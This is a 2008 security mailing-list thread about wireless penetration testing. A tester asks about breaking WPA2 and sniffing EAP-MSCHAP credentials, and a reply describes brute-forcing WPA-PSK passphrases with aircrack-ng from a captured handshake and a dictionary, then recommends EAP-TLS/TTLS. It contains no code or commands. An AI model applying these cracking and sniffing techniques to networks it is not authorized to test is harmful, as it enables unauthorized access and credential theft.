Re: Wireless Pen Test

["anshuman sharma" <anshuman251 () gmail com>]

Thanks a lot to all of you for all your answers.

To give you all move details. The authentication for getting the
access to the Wireless Network is through RADIUS, thus you require
domain logins for authentication. Then on AP WPA2 AES is used.

So, is there any tool available to sniff the wireless traffic. I am
taking an example that an employee near by to the office wants to log
in to the network through wireless and near by another user using a
tool (possible Wireshark) to sniff the traffic. Now when the user
tries to login, he will send the credential for authentication and the
AP will forward the request to RADIUS for authentication. Can this
packet be sniffed and can the credential be recovered. Authentication
type is EAP-MSCHAP.

Thanks and Regards
Anshuman

On Thu, Nov 27, 2008 at 8:38 AM, Kevin Horvath <kevin.horvath () gmail com> wrote:
> Assuming you are referring to WPA2-psk you can use aircrack-ng to brute
> force the WPA(2) passphrase by providing it a dictionary and the SSID which
> is used as the salt.  Its not cracking the encryption (AES) is just brute
> forcing the hashed output to recover the key.  If you have the passphrase in
> your dictionary and the 4 way handshake then you can recover it.  WEP is
> broken and cracked but WPA (TKIP encryption) is not fully broken yet but the
> guys from the aircrack team (Hirte especially) already discovered the first
> kink in its armor.  Although while its not fully broken you can perform the
> same bruteforce attack as mentioned above against it also.
>
> Also if your telling a client that using WPA(2) psk is secure then you are
> doing an injustice to your client....Yes even if the key is very long and
> complex and not in any dictionary.  The whole point of having a shared key
> is insecure since all it takes is for one laptop to get hacked or stolen and
> then your compromised.  If you want to tell a client they are secure then
> you need to be recommending wpa(2) enterprise using EAP-TLS or EAP-TTLS.
>
> Please dont tell a client WPA2/CCMP/AES - PSK is secure (for businesses that
> is) as you are only as secure as your weakest client.
>
> On Wed, Nov 26, 2008 at 10:37 AM, anshuman sharma <anshuman251 () gmail com>
> wrote:
> > Hi All,
> >
> > Is there any tool available to break WAP2 encryption (I searched a lot
> > but was not able to find any). I know using Aircrack (Airodump and
> > Aireplay), WEP and WPA key can be breaked. But if the encyption is
> > WPA2 can we give a reasonable assurance to the client that the Wifi
> > network is secure from outside.
> >
> > Thanks and Regards
> > Anshuman
> >
> > ------------------------------------------------------------------------
> > This list is sponsored by: Cenzic
> >
> > Security Trends Report from Cenzic
> > Stay Ahead of the Hacker Curve!
> > Get the latest Q2 2008 Trends Report now
> >
> > www.cenzic.com/landing/trends-report
> > ------------------------------------------------------------------------

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve!
Get the latest Q2 2008 Trends Report now

www.cenzic.com/landing/trends-report
------------------------------------------------------------------------